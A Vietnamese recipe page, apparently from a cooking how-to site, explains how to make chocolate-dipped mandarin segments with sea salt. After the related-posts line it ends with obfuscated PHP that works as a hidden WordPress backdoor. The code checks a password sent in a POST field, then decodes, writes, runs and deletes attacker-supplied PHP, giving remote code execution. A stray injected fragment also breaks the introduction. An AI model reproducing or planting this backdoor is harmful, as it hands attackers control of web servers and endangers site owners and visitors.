Cách làm socola bọc quýt lạ miệng

Để có một kỳ nghỉ mát tuyệt vời trong mùa hè năm nay. Sau khi chuẩn bị tất cả các thực phẩm và đồ uống. Các bà mẹ không quên chuẩn bị món ngọt dành cho các bé. Một món ngọt vô cùng đẹp mắt và ngọt ngào tình yêu. Bạn có thể kết hợp

“>rất nhiều Vitamin C và chất chống oxy hóa, bạn sẽ an tâm không lo sợ mệt mỏi sau những cuộc chơi đầy thách thức. Nhắc đến đây, Wikicachlam sẽ giới thiệu các bạn cách làm món socola bọc buýt ăn thật lạ miệng, món này không chỉ dành cho các bé mà còn món ưa thích của một số chị em phụ nữ vì món này vừa có vị ngọt của socola vừa có vị chua của quýt. Sau đây Wiki sẽ hướng dẫn cách làm món này nhé!

Hướng dẫn làm món socola bọc quýt thơm ngon

Nguyên Liệu

Trước khi thực hiện món này, các bạn cần có những vật liệu sau:

  • 4-5 quả quýt
  • ½ chén socola hoặc socola chip
  • Muối biển ( miền Nam hay gọi là nước hột)
  • Một số vật dụng thiếu yếu khác
Xem Thêm  Tặng gì cho bạn gái ngày valentine để thay lời muốn nói

Cách Làm

1.  Các bạn nên chọn những quả quýt căng tròn, tránh dập sẽ làm hôi ê. Sau đó, chúng ta sẽ bóc sạch vỏ bên ngoài và những sợ trắng nhỏ xung quanh quả quýt. Tiếp theo sẽ tách thành từng múi nhỏ.

Cách làm socola bọc quýt lạ miệng-1

2.  Các bạn cho socola vào trong một cái chén ( chén này được sử dụng cho lò vi sóng nhé) rồi cho chén socola này vào lò vi sóng để làm tan chảy socola. Sau khi socola tan chảy hết, chúng ta lấy chén ra, nhúng từng múi quýt vào. Lưu ý: chỉ nhúng ½ của múi quýt thôi nhé. Khi nhúng xong, các bạn nhớ rắc thêm một ít muối biển lên trên bề mặt của socola nhé. Tất cả những múi quýt sẽ được đặt trên tấm giấy da.

Cách làm socola bọc quýt lạ miệng-2

3.  Sau khi thực hiện hết các giai đoạn các bạn không quên cho tất cả những múi quýt đã được nhúng socola vào trong tủ lạnh nhé. Thời gian chừng 10 phút thôi nhé các bạn hoặc có thể để lâu hơn nếu socola của các bạn chưa đông cứng.

Cách làm socola bọc quýt lạ miệng-3

4. Khâu cuối cùng các bạn chỉ có việc đem chúng ra khỏi tủ lạnh và thưởng thức những múi quýt được nhúng socola mà thôi.

Cách làm socola bọc quýt lạ miệng-4

Nếu dùng không hết, bạn có thể cho socola bọc quýt vào hộp hoặc lưu trữ trong túi kín rồi bỏ vào trong tủ lạnh. Với cách đó socola bọc quýt của chúng ta sẽ được bảo quản trong 2 ngày nhé! Chúc các bạn thành công.

Xem Thêm  Cách chọn quà tặng vợ bầu nhân ngày 20/10

Wiki Cách Làm

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}